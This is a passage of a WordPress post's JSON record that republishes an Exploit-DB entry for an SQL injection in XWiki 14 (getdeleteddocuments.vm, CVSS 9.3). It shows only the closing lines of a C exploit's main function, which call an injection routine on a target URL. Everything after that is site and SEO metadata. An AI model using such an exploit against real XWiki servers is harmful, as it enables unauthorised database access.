{<br \/>\n<br \/>        selecetCookie = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>        verbose = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    injection(yourUrl);<br \/>\n<br \/>    return 0;<br \/>\n<br \/>}\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52384\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Exploit ID EDB-ID:52384 Type exploitdb Published 2025-07-28T00:00:00 Modified 2025-07-28T00:00:00 CVSS Information 
CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,40,13,7,11,5],"class_list":["post-9195","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head_json":{"title":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=9195","og_locale":"en_US","og_type":"article","og_title":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem","og_description":"Exploit Details Basic Information Exploit Title XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Exploit ID EDB-ID:52384 Type exploitdb Published 2025-07-28T00:00:00 Modified 2025-07-28T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=9195","og_site_name":"zero redgem","article_published_time":"2025-07-29T03:38:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=9195#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=9195"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm","datePublished":"2025-07-29T03:38:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=9195"},"wordCount":2237,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=9195#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=9195","url":"https:\/\/zero.redgem.net\/?p=9195","name":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero 
redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-29T03:38:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=9195#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=9195"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=9195#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 
redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9195"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9195\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}